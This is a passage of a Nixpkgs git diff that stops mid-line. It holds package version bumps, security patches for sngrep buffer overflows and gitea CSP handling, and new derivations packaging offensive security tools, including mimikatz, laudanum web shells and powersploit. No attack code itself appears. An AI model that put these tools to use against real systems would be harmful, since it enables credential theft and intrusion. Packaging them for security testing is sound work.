$out/bin/anydesk \ --prefix PATH : ${lib.makeBinPath [ lsb-release pciutils ]} - - substituteInPlace $out/share/applications/*.desktop \ - --subst-var out ''; + passthru = { + updateScript = genericUpdater { + versionLister = writeShellScript "anydesk-versionLister" '' + curl -s https://anydesk.com/en/downloads/linux \ + | grep "https://[a-z0-9._/-]*-amd64.tar.gz" -o \ + | uniq \ + | sed 's,.*/anydesk-\(.*\)-amd64.tar.gz,\1,g' + ''; + }; + }; + meta = with lib; { inherit description; homepage = "https://www.anydesk.com"; diff --git a/pkgs/applications/networking/remote/freerdp/default.nix b/pkgs/applications/networking/remote/freerdp/default.nix index 38307974caab1..a3273b3314def 100644 --- a/pkgs/applications/networking/remote/freerdp/default.nix +++ b/pkgs/applications/networking/remote/freerdp/default.nix @@ -76,13 +76,13 @@ let in stdenv.mkDerivation rec { pname = "freerdp"; - version = "2.11.5"; + version = "2.11.7"; src = fetchFromGitHub { owner = "FreeRDP"; repo = "FreeRDP"; rev = version; - hash = "sha256-WyYBIiIQNDHydJqU3jWNItJU2/sYnRpGHCXE9Xhom5M="; + hash = "sha256-w+xyMNFmKylSheK0yAGl8J6MXly/HUjjAfR9Qq3s/kA="; }; postPatch = '' diff --git a/pkgs/applications/networking/shellhub-agent/default.nix b/pkgs/applications/networking/shellhub-agent/default.nix index 66662b7f058f4..071425dedc005 100644 --- a/pkgs/applications/networking/shellhub-agent/default.nix +++ b/pkgs/applications/networking/shellhub-agent/default.nix @@ -11,18 +11,18 @@ buildGoModule rec { pname = "shellhub-agent"; - version = "0.14.3"; + version = "0.15.0"; src = fetchFromGitHub { owner = "shellhub-io"; repo = "shellhub"; rev = "v${version}"; - hash = "sha256-XnkU/I41x6JqrH5D6JGw1fgdiNfiMOBy9DUUXzKwkGg="; + hash = "sha256-533GGzSlpF9Rz8SrV0x6Hea/H8WxujuPF3cwmL5vdCw="; }; modRoot = "./agent"; - vendorHash = "sha256-nuFgJc1xQU4X86ojdFzs+9Gp3HDLsw3tkMcprlXCrko="; + vendorHash = "sha256-F3di9oTuE7qWzvAbHMkrSG+hkEs7FpEo4tLX6dCdklY="; ldflags = [ "-s" "-w" "-X main.AgentVersion=v${version}" ]; diff --git a/pkgs/applications/networking/sniffers/sngrep/1.7.0-CVE-2024-3119-CVE-2024-3120.patch b/pkgs/applications/networking/sniffers/sngrep/1.7.0-CVE-2024-3119-CVE-2024-3120.patch new file mode 100644 index 0000000000000..29ea997fee464 --- /dev/null +++ b/pkgs/applications/networking/sniffers/sngrep/1.7.0-CVE-2024-3119-CVE-2024-3120.patch @@ -0,0 +1,74 @@ +Based on upstream dd5fec92730562af6f96891291cd4e102b80bfcc, adjusted to +apply cleanly to 1.7.0 + +diff --git a/src/sip.c b/src/sip.c +index 20a2d81..f2dde5c 100644 +--- a/src/sip.c ++++ b/src/sip.c +@@ -264,7 +264,7 @@ sip_validate_packet(packet_t *packet) + uint32_t plen = packet_payloadlen(packet); + u_char payload[MAX_SIP_PAYLOAD]; + regmatch_t pmatch[4]; +- char cl_header[10]; ++ char cl_header[MAX_CONTENT_LENGTH_SIZE]; + int content_len; + int bodylen; + +@@ -291,7 +291,15 @@ sip_validate_packet(packet_t *packet) + return VALIDATE_PARTIAL_SIP; + } + +- strncpy(cl_header, (const char *)payload + pmatch[2].rm_so, (int)pmatch[2].rm_eo - pmatch[2].rm_so); ++ // Ensure the copy length does not exceed MAX_CONTENT_LENGTH_SIZE - 1 ++ int cl_match_len = pmatch[2].rm_eo - pmatch[2].rm_so; ++ if (cl_match_len > MAX_CONTENT_LENGTH_SIZE - 1) { ++ cl_match_len = MAX_CONTENT_LENGTH_SIZE - 1; ++ } ++ ++ strncpy(cl_header, (const char *)payload + pmatch[2].rm_so, cl_match_len); ++ cl_header[cl_match_len] = '\0'; // Ensuring null termination ++ + content_len = atoi(cl_header); + + // Check if we have Body separator field +@@ -756,7 +764,7 @@ void + sip_parse_extra_headers(sip_msg_t *msg, const u_char *payload) + { + regmatch_t pmatch[4]; +- char warning[10]; ++ char warning[MAX_WARNING_SIZE]; + + // Reason text + if (regexec(&calls.reg_reason, (const char *)payload, 2, pmatch, 0) == 0) { +@@ -766,8 +774,16 @@ sip_parse_extra_headers(sip_msg_t *msg, const u_char *payload) + + // Warning code + if (regexec(&calls.reg_warning, (const char *)payload, 2, pmatch, 0) == 0) { +- strncpy(warning, (const char *)payload + pmatch[1].rm_so, (int)pmatch[1].rm_eo - pmatch[1].rm_so); +- msg->call->warning = atoi(warning); ++ ++ // Ensure the copy length does not exceed MAX_WARNING_SIZE - 1 ++ int warning_match_len = pmatch[1].rm_eo - pmatch[1].rm_so; ++ if (warning_match_len > MAX_WARNING_SIZE - 1) { ++ warning_match_len = MAX_WARNING_SIZE - 1; ++ } ++ strncpy(warning, (const char *)payload + pmatch[1].rm_so, warning_match_len); ++ warning[warning_match_len] = '\0'; // Ensuring null termination ++ ++ msg->call->warning = atoi(warning); + } + } + +diff --git a/src/sip.h b/src/sip.h +index 78afdc2..a9fd06e 100644 +--- a/src/sip.h ++++ b/src/sip.h +@@ -45,6 +45,8 @@ + #include "hash.h" + + #define MAX_SIP_PAYLOAD 10240 ++#define MAX_CONTENT_LENGTH_SIZE 10 ++#define MAX_WARNING_SIZE 10 + + //! Shorter declaration of sip_call_list structure + typedef struct sip_call_list sip_call_list_t; diff --git a/pkgs/applications/networking/sniffers/sngrep/default.nix b/pkgs/applications/networking/sniffers/sngrep/default.nix index 36084ae3acda7..2794669111c37 100644 --- a/pkgs/applications/networking/sniffers/sngrep/default.nix +++ b/pkgs/applications/networking/sniffers/sngrep/default.nix @@ -27,6 +27,7 @@ stdenv.mkDerivation rec { url = "https://github.com/irontec/sngrep/commit/ad1daf15c8387bfbb48097c25197bf330d2d98fc.patch"; hash = "sha256-g8fxvxi3d7jmZEKTbxqw29hJbm/ShsKKxstsOUGxTug="; }) + ./1.7.0-CVE-2024-3119-CVE-2024-3120.patch ]; nativeBuildInputs = [ diff --git a/pkgs/applications/science/logic/why3/default.nix b/pkgs/applications/science/logic/why3/default.nix index 1676ca4c2a4f1..74659a58f13ee 100644 --- a/pkgs/applications/science/logic/why3/default.nix +++ b/pkgs/applications/science/logic/why3/default.nix @@ -1,6 +1,6 @@ { callPackage, fetchurl, lib, stdenv , ocamlPackages, coqPackages, rubber, hevea, emacs -, version ? "1.7.1" +, version ? "1.7.2" , ideSupport ? true , wrapGAppsHook }: @@ -12,7 +12,7 @@ stdenv.mkDerivation rec { src = fetchurl { url = "https://why3.gitlabpages.inria.fr/releases/${pname}-${version}.tar.gz"; hash = { - "1.7.1" = "sha256-rG1hcxFhQ2PlE9RTz9ELliDjCuSzLnJ1togRY637cU4="; + "1.7.2" = "sha256-VaSG/FiO2MDdSSFXGJJrIylQx0LPwtT8AF7TpPVZhCQ="; "1.6.0" = "sha256-hFvM6kHScaCtcHCc6Vezl9CR7BFbiKPoTEh7kj0ZJxw="; }."${version}"; }; diff --git a/pkgs/applications/version-management/git-hound/default.nix b/pkgs/applications/version-management/git-hound/default.nix index 7a135b69a2e3b..86efeef1c4445 100644 --- a/pkgs/applications/version-management/git-hound/default.nix +++ b/pkgs/applications/version-management/git-hound/default.nix @@ -1,20 +1,32 @@ { buildGoModule , fetchFromGitHub +, fetchpatch , lib }: buildGoModule rec { pname = "git-hound"; - version = "1.4"; + version = "1.7.2"; src = fetchFromGitHub { owner = "tillson"; repo = pname; rev = "v${version}"; - sha256 = "sha256-HD5OK8HjnLDbyC/TmVI2HfBRIUCyyHTbA3JvKoeXV5E="; + hash = "sha256-W+rYDyRIw4jWWO4UZkUHFq/D/7ZXM+y5vdbclk6S0ro="; }; - vendorHash = null; + patches = [ + # https://github.com/tillson/git-hound/pull/66 + (fetchpatch { + url = "https://github.com/tillson/git-hound/commit/cd8aa19401cfdec9e4d76c1f6eb4d85928ec4b03.patch"; + hash = "sha256-EkdR2KkxxlMLNtKFGpxsQ/msJT5NcMF7irIUcU2WWJY="; + }) + ]; + + # tests fail outside of nix + doCheck = false; + + vendorHash = "sha256-8teIa083oMXm0SjzMP+mGOVAel1Hbsp3TSMhdvqVbQs="; meta = with lib; { description = "Reconnaissance tool for GitHub code search"; @@ -26,6 +38,6 @@ buildGoModule rec { homepage = "https://github.com/tillson/git-hound"; license = with licenses; [ mit ]; maintainers = with maintainers; [ fab ]; - broken = true; # vendor isn't reproducible with go > 1.17: nix-build -A $name.goModules --check + mainProgram = "git-hound"; }; } diff --git a/pkgs/applications/version-management/gitea/csp-early-1.21.11.patch b/pkgs/applications/version-management/gitea/csp-early-1.21.11.patch new file mode 100644 index 0000000000000..2b479fb21cf7b --- /dev/null +++ b/pkgs/applications/version-management/gitea/csp-early-1.21.11.patch @@ -0,0 +1,20 @@ +diff --git a/routers/web/repo/render.go b/routers/web/repo/render.go +index f07b4e8c11..1fcaa83c4f 100644 +--- a/routers/web/repo/render.go ++++ b/routers/web/repo/render.go +@@ -44,6 +44,7 @@ func RenderFile(ctx *context.Context) { + isTextFile := st.IsText() + + rd := charset.ToUTF8WithFallbackReader(io.MultiReader(bytes.NewReader(buf), dataRc)) ++ ctx.Resp.Header().Add("Content-Security-Policy", "frame-src 'self'; sandbox allow-scripts") + + if markupType := markup.Type(blob.Name()); markupType == "" { + if isTextFile { +@@ -62,7 +63,6 @@ func RenderFile(ctx *context.Context) { + treeLink += "/" + util.PathEscapeSegments(ctx.Repo.TreePath) + } + +- ctx.Resp.Header().Add("Content-Security-Policy", "frame-src 'self'; sandbox allow-scripts") + err = markup.Render(&markup.RenderContext{ + Ctx: ctx, + RelativePath: ctx.Repo.TreePath, diff --git a/pkgs/applications/version-management/gitea/default.nix b/pkgs/applications/version-management/gitea/default.nix index 9f452d73f46ed..58f73aa4bc56a 100644 --- a/pkgs/applications/version-management/gitea/default.nix +++ b/pkgs/applications/version-management/gitea/default.nix @@ -39,6 +39,9 @@ buildGoModule rec { hash = "sha256-cThW3EnHR695thajbnmfNziVB/iBP9OPeDgWbszYIeg="; }) ./XSS-vulnerabilities-1.21.6.patch + + # Derived from https://github.com/go-gitea/gitea/pull/30136 + ./csp-early-1.21.11.patch ]; postPatch = '' diff --git a/pkgs/applications/version-management/gitlab/data.json b/pkgs/applications/version-management/gitlab/data.json index 09ef9a290d7ba..ff2bbcf877c05 100644 --- a/pkgs/applications/version-management/gitlab/data.json +++ b/pkgs/applications/version-management/gitlab/data.json @@ -1,15 +1,15 @@ { - "version": "16.10.3", - "repo_hash": "sha256-JeZHnoNMk7NYBeUy25YK+f6K7WOeTQnYV/pG08bmiwA=", + "version": "16.10.4", + "repo_hash": "sha256-ieS2MO5jBNBK0hmuWLfaDjRNhn98927hlTFrDbV0zCQ=", "yarn_hash": "0yzywfg4lqxjwm5cqsm4bn97zcrfvpnrs8rjrv9wv3xqvi9h9skd", "owner": "gitlab-org", "repo": "gitlab", - "rev": "v16.10.3-ee", + "rev": "v16.10.4-ee", "passthru": { - "GITALY_SERVER_VERSION": "16.10.3", - "GITLAB_PAGES_VERSION": "16.10.3", + "GITALY_SERVER_VERSION": "16.10.4", + "GITLAB_PAGES_VERSION": "16.10.4", "GITLAB_SHELL_VERSION": "14.34.0", "GITLAB_ELASTICSEARCH_INDEXER_VERSION": "4.8.0", - "GITLAB_WORKHORSE_VERSION": "16.10.3" + "GITLAB_WORKHORSE_VERSION": "16.10.4" } } diff --git a/pkgs/applications/version-management/gitlab/gitaly/default.nix b/pkgs/applications/version-management/gitlab/gitaly/default.nix index b0adadb93efc8..ac63b4296b7aa 100644 --- a/pkgs/applications/version-management/gitlab/gitaly/default.nix +++ b/pkgs/applications/version-management/gitlab/gitaly/default.nix @@ -6,7 +6,7 @@ }: let - version = "16.10.3"; + version = "16.10.4"; package_version = "v${lib.versions.major version}"; gitaly_package = "gitlab.com/gitlab-org/gitaly/${package_version}"; @@ -18,10 +18,10 @@ let owner = "gitlab-org"; repo = "gitaly"; rev = "v${version}"; - hash = "sha256-WdEYZL3g/aYh2Iy1ZgJhIHgQ4967FOxhiuQEokk1S2A="; + hash = "sha256-dzHGnZwXomCUrlup9VD/0l084Swp9CVi4nJi6MtOwi8="; }; - vendorHash = "sha256-zaldiRg7fk/HncpfR7k+dDprsOp1ziQHgX8B4l7bwe0="; + vendorHash = "sha256-mPoz+y1LWpGr+zYqAhxzznMyKIPehsDW+WFxklYSC10="; ldflags = [ "-X ${gitaly_package}/internal/version.version=${version}" "-X ${gitaly_package}/internal/version.moduleVersion=${version}" ]; diff --git a/pkgs/applications/version-management/gitlab/gitlab-container-registry/default.nix b/pkgs/applications/version-management/gitlab/gitlab-container-registry/default.nix index c7f241aa0f426..c92cc3e0ddeb0 100644 --- a/pkgs/applications/version-management/gitlab/gitlab-container-registry/default.nix +++ b/pkgs/applications/version-management/gitlab/gitlab-container-registry/default.nix @@ -2,7 +2,7 @@ buildGoModule rec { pname = "gitlab-container-registry"; - version = "3.92.0"; + version = "3.93.0"; rev = "v${version}-gitlab"; # nixpkgs-update: no auto update @@ -10,7 +10,7 @@ buildGoModule rec { owner = "gitlab-org"; repo = "container-registry"; inherit rev; - hash = "sha256-NHpqfqv3RCbWZilhXLGnQTN+ytzifAix6mcLk5Bw124="; + hash = "sha256-4jsnfkHXs9FSnyQ6JP/zmW51x8fHyQ0n+B8EPOoTSAA="; }; vendorHash = "sha256-KZWdM8Q8ipsgm7OoLyOuHo+4Vg2Nve+yZtTSUDgjOW4="; diff --git a/pkgs/applications/version-management/gitlab/gitlab-pages/default.nix b/pkgs/applications/version-management/gitlab/gitlab-pages/default.nix index 72ac2c8c2b7dd..7e288e0dff577 100644 --- a/pkgs/applications/version-management/gitlab/gitlab-pages/default.nix +++ b/pkgs/applications/version-management/gitlab/gitlab-pages/default.nix @@ -2,14 +2,14 @@ buildGoModule rec { pname = "gitlab-pages"; - version = "16.10.3"; + version = "16.10.4"; # nixpkgs-update: no auto update src = fetchFromGitLab { owner = "gitlab-org"; repo = "gitlab-pages"; rev = "v${version}"; - hash = "sha256-mQNDnxdrM679ejjXZuqSV8SwLXFcKKKGOQt3DJWOZOo="; + hash = "sha256-Jdg1cxHra4lHvf8+cojaE9OXR40w24OiwMhDYvmUBkI="; }; vendorHash = "sha256-WrR4eZRAuYkhr7ZqP7OXqJ6uwvxzn+t+3OdBNcNaq0M="; diff --git a/pkgs/applications/version-management/gitlab/gitlab-workhorse/default.nix b/pkgs/applications/version-management/gitlab/gitlab-workhorse/default.nix index aa80f354b9854..98404f4a4f6d9 100644 --- a/pkgs/applications/version-management/gitlab/gitlab-workhorse/default.nix +++ b/pkgs/applications/version-management/gitlab/gitlab-workhorse/default.nix @@ -5,7 +5,7 @@ in buildGoModule rec { pname = "gitlab-workhorse"; - version = "16.10.3"; + version = "16.10.4"; # nixpkgs-update: no auto update src = fetchFromGitLab { diff --git a/pkgs/development/tools/rust/cargo-bloat/default.nix b/pkgs/by-name/ca/cargo-bloat/package.nix index 03f8922ba6321..b0026988c9a16 100644 --- a/pkgs/development/tools/rust/cargo-bloat/default.nix +++ b/pkgs/by-name/ca/cargo-bloat/package.nix @@ -2,16 +2,16 @@ rustPlatform.buildRustPackage rec { pname = "cargo-bloat"; - version = "0.11.1"; + version = "0.12.0"; src = fetchFromGitHub { owner = "RazrFalcon"; repo = pname; rev = "v${version}"; - sha256 = "sha256-lCA7C1G2xu65jn3/wzj6prWSrjQz3EqqJyMlPR/HRFs="; + hash = "sha256-vPk6ERl0VM1TjK/JRMcXqCvKqSTuw78MsmQ0xImQyd4="; }; - cargoSha256 = "sha256-fOenXn5gagFss9DRDXXsGxQlDqVXZ5LZcdM4WsXAyUU="; + cargoHash = "sha256-6fMFGLH16Z1O+ETlr0685TXHup1vJetfzPdNC2Lw9uM="; meta = with lib; { description = "A tool and Cargo subcommand that helps you find out what takes most of the space in your executable"; @@ -19,6 +19,6 @@ rustPlatform.buildRustPackage rec { license = licenses.mit; platforms = platforms.unix; maintainers = with maintainers; [ xrelkd matthiasbeyer ]; + mainProgram = "cargo-bloat"; }; } - diff --git a/pkgs/by-name/ha/hashid/package.nix b/pkgs/by-name/ha/hashid/package.nix new file mode 100644 index 0000000000000..5679fb1a272d3 --- /dev/null +++ b/pkgs/by-name/ha/hashid/package.nix @@ -0,0 +1,25 @@ +{ lib +, stdenv +, fetchFromGitHub +, python3Packages +}: + +python3Packages.buildPythonApplication { + pname = "hashid"; + version = "3.1.4-unstable-2015-03-17"; + + src = fetchFromGitHub { + owner = "psypanda"; + repo = "hashID"; + rev = "7e8473a823060e56d4b6090a98591e252bd9505e"; + hash = "sha256-R2r/UYRcHbpfOz/XqtSUIpd826eT1Erfo7frAiArT34="; + }; + + meta = with lib; { + description = "Software to identify the different types of hashes"; + homepage = "https://github.com/psypanda/hashID"; + mainProgram = "hashid"; + license = licenses.gpl3Plus; + maintainers = with maintainers; [ d3vil0p3r ]; + }; +} diff --git a/pkgs/by-name/hb/hb-honeypot/package.nix b/pkgs/by-name/hb/hb-honeypot/package.nix new file mode 100644 index 0000000000000..9af60395731e0 --- /dev/null +++ b/pkgs/by-name/hb/hb-honeypot/package.nix @@ -0,0 +1,38 @@ +{ lib +, stdenv +, fetchFromGitHub +, makeWrapper +, perl +}: + +stdenv.mkDerivation { + pname = "hb-honeypot"; + version = "0-unstable-2024-02-13"; + + src = fetchFromGitHub { + owner = "D3vil0p3r"; + repo = "hb-honeypot"; + rev = "06ca7336bfb7deca54eae2cee239496d26f21b5b"; + hash = "sha256-vnq7u/sqDLD+PsZ9DlxfjNuTkO8lhZujjAgmTcWf/3I="; + }; + + nativeBuildInputs = [ makeWrapper ]; + + installPhase = '' + runHook preInstall + mkdir -p $out/{bin,share/hb-honeypot} + cp hb-honeypot.pl $out/share/hb-honeypot/ + makeWrapper ${perl}/bin/perl $out/bin/hb-honeypot \ + --add-flags "$out/share/hb-honeypot/hb-honeypot.pl" + runHook postInstall + ''; + + meta = with lib; { + description = "Script that listens on TCP port 443 and responds with completely bogus SSL heartbeat responses"; + mainProgram = "hb-honeypot"; + homepage = "https://github.com/D3vil0p3r/hb-honeypot"; + maintainers = with maintainers; [ d3vil0p3r ]; + platforms = platforms.unix; + license = licenses.gpl3Plus; + }; +} diff --git a/pkgs/by-name/ht/htb-toolkit/package.nix b/pkgs/by-name/ht/htb-toolkit/package.nix index b833fed50580d..cedbe645f9416 100644 --- a/pkgs/by-name/ht/htb-toolkit/package.nix +++ b/pkgs/by-name/ht/htb-toolkit/package.nix @@ -17,17 +17,17 @@ rustPlatform.buildRustPackage { pname = "htb-toolkit"; - version = "unstable-2024-01-17"; + version = "0-unstable-2024-04-22"; src = fetchFromGitHub { owner = "D3vil0p3r"; repo = "htb-toolkit"; # https://github.com/D3vil0p3r/htb-toolkit/issues/3 - rev = "54e11774ea8746ea540548082d3b25c22306b4fc"; - hash = "sha256-QYUqdqFV9Qn+VbJTnz5hx5I0XV1nrzCoCKtRS7jBLsE="; + rev = "921e4b352a9dd8b3bc8ac8774e13509abd179aef"; + hash = "sha256-o91p/m06pm9qoYZZVh+qHulqHO2G7xVJQPpEvRsq+8Q="; }; - cargoHash = "sha256-XDE6A6EIAUbuzt8Zb/ROfDAPp0ZyN0WQ4D1gWHjRVhg="; + cargoHash = "sha256-vTUiagI0eTrADr6zCMI5btLRvXgZSaohldg4jYmjfyA="; # Patch to disable prompt change of the shell when a target machine is run. Needed due to Nix declarative nature patches = [ @@ -39,24 +39,25 @@ rustPlatform.buildRustPackage { ]; buildInputs = [ - gnome.gnome-keyring openssl + ] ++ lib.optionals stdenv.isLinux [ + gnome.gnome-keyring ] ++ lib.optionals stdenv.isDarwin [ darwin.apple_sdk.frameworks.Security + darwin.apple_sdk.frameworks.SystemConfiguration ]; postPatch = '' substituteInPlace src/manage.rs \ - --replace /usr/share/htb-toolkit/icons/ $out/share/htb-toolkit/icons/ + --replace-fail /usr/share/icons/htb-toolkit/ $out/share/icons/htb-toolkit/ substituteInPlace src/utils.rs \ - --replace /usr/bin/bash ${bash} \ - --replace "\"base64\"" "\"${coreutils}/bin/base64\"" \ - --replace "\"gunzip\"" "\"${gzip}/bin/gunzip\"" + --replace-fail "\"base64\"" "\"${coreutils}/bin/base64\"" \ + --replace-fail "\"gunzip\"" "\"${gzip}/bin/gunzip\"" substituteInPlace src/appkey.rs \ - --replace secret-tool ${lib.getExe libsecret} + --replace-fail secret-tool ${lib.getExe libsecret} substituteInPlace src/vpn.rs \ - --replace "arg(\"openvpn\")" "arg(\"${openvpn}/bin/openvpn\")" \ - --replace "arg(\"killall\")" "arg(\"${killall}/bin/killall\")" + --replace-fail "arg(\"openvpn\")" "arg(\"${openvpn}/bin/openvpn\")" \ + --replace-fail "arg(\"killall\")" "arg(\"${killall}/bin/killall\")" ''; meta = with lib; { diff --git a/pkgs/by-name/la/laudanum/package.nix b/pkgs/by-name/la/laudanum/package.nix new file mode 100644 index 0000000000000..a744fe7720b89 --- /dev/null +++ b/pkgs/by-name/la/laudanum/package.nix @@ -0,0 +1,31 @@ +{ lib +, stdenvNoCC +, fetchFromGitHub +}: + +stdenvNoCC.mkDerivation { + pname = "laudanum"; + version = "1.0-unstable-2017-12-15"; + + src = fetchFromGitHub { + owner = "junk13"; + repo = "laudanum"; + rev = "50e1c09d5f23b446c20ecec652c64f9622348364"; + hash = "sha256-Od/ciCQ5QM4b/u9nizHosj/zte2pdifO8IDZkrcmIeI="; + }; + + installPhase = '' + runHook preInstall + mkdir -p $out/share/laudanum + cp -a * $out/share/laudanum/ + runHook postInstall + ''; + + meta = with lib; { + description = "A collection of injectable files, designed to be used in a pentest when SQL injection flaws are found and are in multiple languages for different environments"; + homepage = "https://github.com/junk13/laudanum"; + maintainers = with maintainers; [ d3vil0p3r ]; + platforms = platforms.all; + license = licenses.gpl2Plus; + }; +} diff --git a/pkgs/by-name/ma/mac-robber/package.nix b/pkgs/by-name/ma/mac-robber/package.nix new file mode 100644 index 0000000000000..977d6bd1bfa39 --- /dev/null +++ b/pkgs/by-name/ma/mac-robber/package.nix @@ -0,0 +1,43 @@ +{ lib +, stdenv +, fetchurl +}: + +stdenv.mkDerivation (finalAttrs: { + pname = "mac-robber"; + version = "1.02"; + + src = fetchurl { + url = "mirror://sourceforge/project/mac-robber/mac-robber/${finalAttrs.version}/mac-robber-${finalAttrs.version}.tar.gz"; + hash = "sha256-WJXTMuyNh+FfIUQcYVRbf2iDCi7iyWfTgXc70IUEgG0="; + }; + + patches = [ + # add GCC hardening. + (fetchurl { + name = "10_add-GCC-hardening.patch"; + url = "https://salsa.debian.org/pkg-security-team/mac-robber/-/raw/b6a59d78e2f58fbfab7f1b3ed9b72531d28693ca/debian/patches/10_add-GCC-hardening.patch"; + hash = "sha256-1ma6Vh1MTE6WlCcm2KzRLK/ZV3hAw7xP25yi7TrIqLI="; + }) + ]; + + makeFlags = [ + "CC=${stdenv.cc.targetPrefix}cc" + "GCC_OPT=" + ]; + + installPhase = '' + runHook preInstall + install -D mac-robber $out/bin/mac-robber + runHook postInstall + ''; + + meta = with lib; { + description = "A digital investigation tool that collects data from allocated files in a mounted file system"; + mainProgram = "mac-robber"; + homepage = "https://www.sleuthkit.org/mac-robber/"; + maintainers = with maintainers; [ d3vil0p3r ]; + platforms = platforms.unix; + license = licenses.gpl2Only; + }; +}) diff --git a/pkgs/by-name/ma/maltego/package.nix b/pkgs/by-name/ma/maltego/package.nix index 223de91d8e768..5c5a011506df2 100644 --- a/pkgs/by-name/ma/maltego/package.nix +++ b/pkgs/by-name/ma/maltego/package.nix @@ -20,16 +20,16 @@ stdenv.mkDerivation (finalAttrs: { }; postPatch = '' - substituteInPlace bin/maltego \ - --replace /usr/bin/awk ${lib.getExe gawk} + substituteInPlace bin/maltego \ + --replace-fail /usr/bin/awk ${lib.getExe gawk} ''; - desktopItems = [ + desktopItems = [ (makeDesktopItem { - name = finalAttrs.pname; + name = "maltego"; desktopName = "Maltego"; - exec = finalAttrs.meta.mainProgram; - icon = finalAttrs.pname; + exec = "maltego"; + icon = "maltego"; comment = "An open source intelligence and forensics application"; categories = [ "Network" "Security" ]; startupNotify = false; @@ -62,7 +62,7 @@ stdenv.mkDerivation (finalAttrs: { cp -aR . "$out/share/maltego/" - makeWrapper $out/share/maltego/bin/maltego $out/bin/${finalAttrs.meta.mainProgram} \ + makeWrapper $out/share/maltego/bin/maltego $out/bin/maltego \ --set JAVA_HOME ${jre} \ --prefix PATH : ${lib.makeBinPath [ jre ]} @@ -74,7 +74,7 @@ stdenv.mkDerivation (finalAttrs: { description = "An open source intelligence and forensics application, enabling to easily gather information about DNS, domains, IP addresses, websites, persons, and so on"; mainProgram = "maltego"; maintainers = with maintainers; [ emilytrau d3vil0p3r ]; - platforms = with platforms; linux ++ darwin; + platforms = platforms.unix; sourceProvenance = with sourceTypes; [ binaryBytecode ]; license = licenses.unfree; }; diff --git a/pkgs/by-name/mi/mimikatz/package.nix b/pkgs/by-name/mi/mimikatz/package.nix new file mode 100644 index 0000000000000..d834e9fdf888b --- /dev/null +++ b/pkgs/by-name/mi/mimikatz/package.nix @@ -0,0 +1,31 @@ +{ lib +, fetchzip +, stdenvNoCC +}: + +stdenvNoCC.mkDerivation (finalAttrs: { + pname = "mimikatz"; + version = "2.2.0-20220919"; + + src = fetchzip { + url = "https://github.com/gentilkiwi/mimikatz/releases/download/${finalAttrs.version}/mimikatz_trunk.zip"; + hash = "sha256-wmatI/rEMziBdNiA3HE3MJ0ckdpvsD+LdbB7SKOYdI0="; + stripRoot = false; + }; + + installPhase = '' + runHook preInstall + mkdir -p $out/share/windows/mimikatz + cp -a * $out/share/windows/mimikatz/ + runHook postInstall + ''; + + meta = { + homepage = "https://github.com/gentilkiwi/mimikatz"; + description = "A little tool to play with Windows security"; + license = with lib.licenses; [ cc-by-40 ]; + maintainers = with lib.maintainers; [ d3vil0p3r ]; + platforms = lib.platforms.all; + sourceProvenance = with lib.sourceTypes; [ binaryNativeCode ]; + }; +}) diff --git a/pkgs/by-name/mi/missidentify/fix-darwin-build.patch b/pkgs/by-name/mi/missidentify/fix-darwin-build.patch new file mode 100644 index 0000000000000..cc54480567afe --- /dev/null +++ b/pkgs/by-name/mi/missidentify/fix-darwin-build.patch @@ -0,0 +1,11 @@ +--- a/main.h ++++ b/main.h +@@ -68,7 +68,7 @@ memset(VAR,0,SIZE * sizeof(TYPE)); + + + +-#ifdef __GLIBC__ ++#if defined(__GLIBC__) || defined (__APPLE__) + extern char *__progname; + #else + char *__progname; \ No newline at end of file diff --git a/pkgs/by-name/mi/missidentify/package.nix b/pkgs/by-name/mi/missidentify/package.nix new file mode 100644 index 0000000000000..2fbce5bf96f2a --- /dev/null +++ b/pkgs/by-name/mi/missidentify/package.nix @@ -0,0 +1,56 @@ +{ lib +, stdenv +, fetchurl +, autoreconfHook +}: + +stdenv.mkDerivation (finalAttrs: { + pname = "missidentify"; + version = "1.0"; + + src = fetchurl { + url = "mirror://sourceforge/project/missidentify/missidentify/missidentify-${finalAttrs.version}/missidentify-${finalAttrs.version}.tar.gz"; + hash = "sha256-nnIRN8hpKM0IZCe0HUrrJGrxvBYKeBmdU168rlo8op0="; + }; + + patches = [ + # define PATH_MAX variable to fix a FTBFS in Hurd. + (fetchurl { + name = "fix-FTBFS-Hurd.patch"; + url = "https://salsa.debian.org/pkg-security-team/missidentify/-/raw/14b7169c3157dbad65fc80fdd82ec6634df20ffd/debian/patches/fix-FTBFS-Hurd.patch"; + hash = "sha256-wGEzTfT76s5Q7s/5s913c4x9MMn9c0v/4Lhr+QakPQY="; + }) + # fix a hyphen used as minus sign and a typo in manpage. + (fetchurl { + name = "fix-manpage.patch"; + url = "https://salsa.debian.org/pkg-security-team/missidentify/-/raw/14b7169c3157dbad65fc80fdd82ec6634df20ffd/debian/patches/fix-manpage.patch"; + hash = "sha256-7LzQs6ETRSjdnEhlKOVWC3grevwOmGs0h4Z6AYGysD8="; + }) + # fix darwin build + ./fix-darwin-build.patch + ]; + + nativeBuildInputs = [ autoreconfHook ]; + + configureFlags = lib.optionals (stdenv.hostPlatform.isAarch32 || stdenv.hostPlatform.isAarch64) [ "--build=arm" ]; + + meta = with lib; { + description = "Find Win32 applications"; + longDescription = '' + Miss Identify is a program to find Win32 applications. In + its default mode it displays the filename of any executable + that does not have an executable extension (i.e. exe, dll, + com, sys, cpl, hxs, hxi, olb, rll, or tlb). The program can + also be run to display all executables encountered, + regardless of the extension. This is handy when looking + for all of the executables on a drive. Other options allow + the user to record the strings found in an executable and + to work recursively. + ''; + mainProgram = "missidentify"; + homepage = "https://missidentify.sourceforge.net"; + maintainers = with maintainers; [ d3vil0p3r ]; + platforms = platforms.unix; + license = licenses.gpl2Only; + }; +}) diff --git a/pkgs/by-name/po/powersploit/package.nix b/pkgs/by-name/po/powersploit/package.nix index 8e33c26ae7383..a3a86cb75c008 100644 --- a/pkgs/by-name/po/powersploit/package.nix +++ b/pkgs/by-name/po/powersploit/package.nix @@ -16,9 +16,9 @@ stdenvNoCC.mkDerivation { installPhase = '' runHook preInstall - mkdir -p $out/share/powersploit - cp -a * $out/share/powersploit - find $out/share -type f -exec chmod -x {} \; + mkdir -p $out/share/windows/powersploit + cp -a * $out/share/windows/powersploit + find $out/share/windows -type f -exec chmod -x {} \; runHook postInstall ''; diff --git a/pkgs/by-name/ri/rifiuti/package.nix b/pkgs/by-name/ri/rifiuti/package.nix new file mode 100644 index 0000000000000..d1134e2288212 --- /dev/null +++ b/pkgs/by-name/ri/rifiuti/package.nix @@ -0,0 +1,64 @@ +{ lib +, stdenv +, fetchzip +, fetchurl +}: + +stdenv.mkDerivation (finalAttrs: { + pname = "rifiuti"; + version = "20040505_1"; + + src = fetchzip { + url = 